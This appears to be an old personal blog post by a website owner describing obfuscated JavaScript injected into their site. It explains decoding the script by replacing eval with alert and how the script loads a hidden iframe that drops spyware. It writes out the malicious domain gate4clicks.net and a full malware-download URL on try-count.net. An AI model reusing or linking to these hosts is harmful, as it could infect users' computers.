Decoding obfuscated Javascript.

Decoding obfuscated Javascript.
Today I woke up hoping that the malicious Javascript code would be gone from my site, but to my surprise it is still here…. it’s still in the Admin panel but it’s gone from the pages that all of you see (Public Pages).
The code that I found that was implanted on my footers and headers was Obfuscated Javascript. Obfuscated Javascript, for those of you who are not tech savvy, means a Javascript code that has been “Encrypted” so that a human will have a hard time reading it but a browser will still read it as if it was normal Javascript code.

Even though it’s hard for a human to understand what the code means, it’s still very easy to decode the code, here is how I did it.

Malicious Javascript

Click the image for a better view

As you can see, that is the whole un-edited Malicious Javascript code that was planted on my footers and headers.
I can’t understand half of what it does right now but after I’m done with it, it’ll be transformed into plain old Javascript code.

Changing the code
After finding the code on my pages, I made a new .html page on my domain. I inserted the Javascript code that I found on my site as well as the DOCTYPE, and the header title. I then looked for a part that said “eval” or “document.write”, I didn’t find document.write but I did find “Eval”, as you can see here:

And I changed it to “Alert”, like so:

The Code
After changing the code to Alert, what the browser does when it reads the code is, instead of running the code, it makes an Alert pop up that contains the Malicious Javascript code, and obviously you would need to actually know Javascript in order to know what that does, otherwise it’s just random letters to you.

How it Works
What that code does is that it opens an iFrame (A code that creates an inline frame that contains another document.) that loads a randomly generated page of the Hacker’s website, (in this case the Hacker’s website is gate4clicks.net) and hides the page. The hacker’s website that was opened has more obfuscated code in it and it loads up some DirectX window, and a Java application window, which then try to download a Spyware program on your computer (I’m not entirely sure as to what it downloads… but this site did infect a computer, for privacy reasons I won’t say who… but it starts to open some Command Prompt windows and some “Are you sure you want to install ‘example’?” Pop Ups).

Deleting the Spyware
The problem can be easily reverted if you use the Windows Restore program often. If you don’t know what that is then go to “Start” > “All Programs” > “Accessories” > “System Tools” > “System Restore”

You can also delete the Spyware if you have a Anti Virus Program, such as Mcafee or Norton Anti Virus.

I also found that the website leaves a cookie, so I would suggest that you delete your Internet Files as well, if you want a good program that does this, then I suggest you download CCleaner, a free program. It does a great job at deleting private files.

The hack only works on Internet Explorer, if you have firefox you are safe. But I would still suggest you delete your files and do a virus scan on your computer.
———————————————————————————–

EDIT
I am willing to be that it’s a Kiddie hacker (a person who has no idea what they are doing about hacking, and just use other people’s programs to hack), trying to impress someone as I just found a toolkit that does what I said above. It’s sold for $20 in a Russian hosted website. The toolkit is called “WebAttacker”… this will bring some idiotic people trying to be hackers with programs they haven’t even created… It’s the return of the kiddies!
I found an article here that explains exactly what it does.

Another Edit
Here is a page of one of the sites that Hacked me.
try-count.net/dl/newnew.php?adv=194
The website contains some Malicious Javascript Encoded code like this one:
Code
And when decoded it comes up to
Decoded(This file was edited as even saved as a .txt file would try to download a trojan called VBS/prime on your computer)
As you can see, the website opens DirectX. There are many other lines but The other ones were harder to decode.

New Edit
I just got a Pop Up from Mcafee saying they removed a trojan…. Good job kiddie. Make your own tools next time.
The name of the Trojan is VBS/Psyme
http://vil.nai.com/vil/content/v_100749.htm